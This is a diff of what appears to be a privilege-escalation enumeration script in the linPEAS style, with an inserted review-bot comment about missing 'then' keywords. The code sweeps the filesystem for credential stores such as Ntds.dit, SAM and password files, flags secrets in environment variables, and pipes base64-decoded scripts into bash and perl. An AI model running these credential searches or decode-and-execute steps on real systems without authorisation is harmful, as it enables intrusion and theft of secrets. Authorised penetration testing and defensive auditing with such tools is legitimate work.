"^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "kcpassword$" | sort | uniq | head -n 70) + PSTORAGE_SENTRY=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) + PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "environments$" | sort | uniq | head -n 70) + PSTORAGE_CACTI=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "cacti$" | sort | uniq | head -n 70) + PSTORAGE_ROUNDCUBE=$(echo -e 
"$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "roundcube$" | sort | uniq | head -n 70) + PSTORAGE_PASSBOLT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) + PSTORAGE_JETTY=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70) + PSTORAGE_WGET=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.wgetrc$" | sort | 
uniq | head -n 70) + PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) + PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) + PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E 
"unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) + PSTORAGE_DATABASE=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) + PSTORAGE_BACKUPS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "backup$|backups$" | sort | uniq | head -n 70) + PSTORAGE_PASSWORD_FILES=$(echo -e 
"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) ##### POST SERACH VARIABLES ##### 
@@ -1233,154 +1234,165 @@ if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFil fi -if echo $CHECKS | grep -q SysI; then - ########################################### - #-------------) System Info (-------------# - ########################################### - print_title "System Information" - #-- SY) OS - print_2title "Operative system" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" - (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," - warn_exec lsb_release -a 2>/dev/null - if [ "$MACPEAS" ]; then - warn_exec system_profiler SPSoftwareDataType - fi - echo "" - #-- SY) Sudo - print_2title "Sudo version" - if [ "$(command -v sudo 2>/dev/null)" ]; then - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" - sudo -V 2>/dev/null | grep 
"Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," - else echo_not_found "sudo" - fi - echo "" - #--SY) USBCreator - print_2title "USBCreator" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" - if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then - pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") - if [ -z "$pc_version" ]; then - pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) + + + + + + + + +if echo $CHECKS | grep -q system_information; +print_title "System Information" +########################################### +#-------------) System Info (-------------# +########################################### + +#-- SY) OS +print_2title "Operative system" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} 
"s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," +warn_exec lsb_release -a 2>/dev/null +if [ "$MACPEAS" ]; then +warn_exec system_profiler SPSoftwareDataType +fi +echo "" + +#-- SY) Sudo +print_2title "Sudo version" +if [ "$(command -v sudo 2>/dev/null)" ]; then +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" +sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," +else echo_not_found "sudo" +fi +echo "" + +#--SY) USBCreator +print_2title "USBCreator" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" +if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then +pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") +if [ -z "$pc_version" ]; then + pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) +fi +if [ -n "$pc_version" ]; then + pc_length=${#pc_version} + pc_major=$(echo "$pc_version" | cut -d. -f1) + pc_minor=$(echo "$pc_version" | cut -d. -f2) + if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then + echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," fi - if [ -n "$pc_version" ]; then - pc_length=${#pc_version} - pc_major=$(echo "$pc_version" | cut -d. -f1) - pc_minor=$(echo "$pc_version" | cut -d. -f2) - if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then - echo "Vulnerable!!" 
| sed -${E} "s,.*,${SED_RED}," - fi - fi - fi - echo "" +fi +fi +echo "" - #-- SY) PATH - print_2title "PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" - echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" - echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" - echo "" +#-- SY) PATH +print_2title "PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" +echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" +echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" +echo "" - #-- SY) Date - print_2title "Date & uptime" - warn_exec date 2>/dev/null - warn_exec uptime 2>/dev/null - echo "" +#-- SY) Date +print_2title "Date & uptime" +warn_exec date 2>/dev/null +warn_exec uptime 2>/dev/null +echo "" - #-- SY) System stats - print_2title "System stats" - (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" - warn_exec free 2>/dev/null - echo "" +#-- SY) System stats +print_2title "System stats" +(df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" +warn_exec free 2>/dev/null +echo "" - #-- SY) CPU info - print_2title "CPU info" - warn_exec lscpu 2>/dev/null - echo "" +#-- SY) CPU info +print_2title "CPU info" +warn_exec lscpu 2>/dev/null +echo "" - #-- SY) Environment vars - print_2title "Environment" - print_info "Any private information inside environment variables?" 
- (env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" - echo "" +#-- SY) Environment vars +print_2title "Environment" +print_info "Any private information inside environment variables?" +(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" +echo "" - #-- SY) Dmesg - print_2title "Searching Signature verification failed in dmseg" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" - (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" - echo "" +#-- SY) Dmesg +print_2title "Searching Signature verification failed in dmseg" +print_info 
"https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" +(dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" +echo "" - #-- SY) Kernel extensions - if [ "$MACPEAS" ]; then +#-- SY) Kernel extensions +if [ "$MACPEAS" ]; then print_2title "Kernel Extensions not belonging to apple" kextstat 2>/dev/null | grep -Ev " com.apple." print_2title "Unsigned Kernel Extensions" macosNotSigned /Library/Extensions macosNotSigned /System/Library/Extensions - fi +fi - if [ "$(command -v bash 2>/dev/null)" ]; then +if [ "$(command -v bash 2>/dev/null)" ]; then print_2title "Executing Linux Exploit Suggester" print_info "https://github.com/mzet-/linux-exploit-suggester" les_b64="" echo $les_b64 | base64 -d | bash echo "" - fi +fi - if [ "$(command -v perl 2>/dev/null)" ]; then +if [ "$(command -v perl 2>/dev/null)" ]; then print_2title "Executing Linux Exploit Suggester 2" print_info "https://github.com/jondonas/linux-exploit-suggester-2" les2_b64="" echo $les2_b64 | base64 -d | perl echo "" - fi +fi - if [ "$(command -v brew 2>/dev/null)" ]; then +if [ "$(command -v brew 2>/dev/null)" ]; then print_2title "Brew Doctor Suggestions" brew doctor echo "" - fi +fi - #-- SY) AppArmor - print_2title "Protections" - print_list "AppArmor enabled? .............. "$NC - if [ "$(command -v aa-status 2>/dev/null)" ]; then +#-- SY) AppArmor +print_2title "Protections" +print_list "AppArmor enabled? .............. "$NC +if [ "$(command -v aa-status 2>/dev/null)" ]; then aa-status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then +elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then +elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then ls -d /etc/apparmor* - else +else echo_not_found "AppArmor" - fi +fi - #-- SY) grsecurity - print_list "grsecurity present? ............ 
"$NC - ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") +#-- SY) grsecurity +print_list "grsecurity present? ............ "$NC +( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") - #-- SY) PaX - print_list "PaX bins present? .............. "$NC - (command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") +#-- SY) PaX +print_list "PaX bins present? .............. "$NC +(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") - #-- SY) Execshield - print_list "Execshield enabled? ............ "$NC - (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," +#-- SY) Execshield +print_list "Execshield enabled? ............ "$NC +(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," - #-- SY) SElinux - print_list "SELinux enabled? ............... "$NC - (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," +#-- SY) SElinux +print_list "SELinux enabled? ............... "$NC +(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - #-- SY) Gatekeeper - if [ "$MACPEAS" ]; then +#-- SY) Gatekeeper +if [ "$MACPEAS" ]; then print_list "Gatekeeper enabled? .......... "$NC (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - + print_list "sleepimage encrypted? ........ "$NC (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no 
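Review bot: The new section guard at the top of this hunk, `if echo $CHECKS | grep -q system_information;`, is missing `then`, so the shell cannot parse the compound command and the script aborts at that point; the same omission appears on the new `container` and `available_software` guards in the following hunk. The fix is `if echo $CHECKS | grep -q system_information; then` (and likewise for the other two), and since this file appears to be the auto-built output described in CONTRIBUTING.md, the correction belongs in the builder part that emits these guards rather than in this file alone. The new `echo''` lines only work because they parse as `echo` with no argument; `echo ""` is the form used everywhere else in the script and reads unambiguously. The `if` block opened here is closed by a `fi` in the next hunk, outside this one.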
@@ -1395,1045 +1407,995 @@ if echo $CHECKS | grep -q SysI; then print_list "Connected to AD? ............. "$NC dsconfigad -show && echo "" || echo_no - fi +fi - #-- SY) ASLR - print_list "Is ASLR enabled? ............... "$NC - ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) - if [ -z "$ASLR" ]; then +#-- SY) ASLR +print_list "Is ASLR enabled? ............... "$NC +ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) +if [ -z "$ASLR" ]; then echo_not_found "/proc/sys/kernel/randomize_va_space"; - else +else if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi echo "" - fi +fi - #-- SY) Printer - print_list "Printer? ....................... "$NC - (lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null +#-- SY) Printer +print_list "Printer? ....................... "$NC +(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null - #-- SY) Running in a virtual environment - print_list "Is this a virtual machine? ..... "$NC - hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) - if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then +#-- SY) Running in a virtual environment +print_list "Is this a virtual machine? ..... 
"$NC +hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) +if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then detectedvirt=$(systemd-detect-virt) if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi - else +else if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi - fi - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -if echo $CHECKS | grep -q Container; then - ############################################## - #---------------) Containers (---------------# - ############################################## - print_title "Containers" - containerCheck +if echo $CHECKS | grep -q container; +print_title "Container" +############################################## +#---------------) Containers (---------------# +############################################## +containerCheck - print_2title "Container related tools present" - command -v "$CONTAINER_CMDS" +print_2title "Container related tools present" +command -v "$CONTAINER_CMDS" - print_2title "Container details" - print_list "Is this a container? ...........$NC $containerType" +print_2title "Container details" +print_list "Is this a container? ...........$NC $containerType" - print_list "Any running containers? ........ 
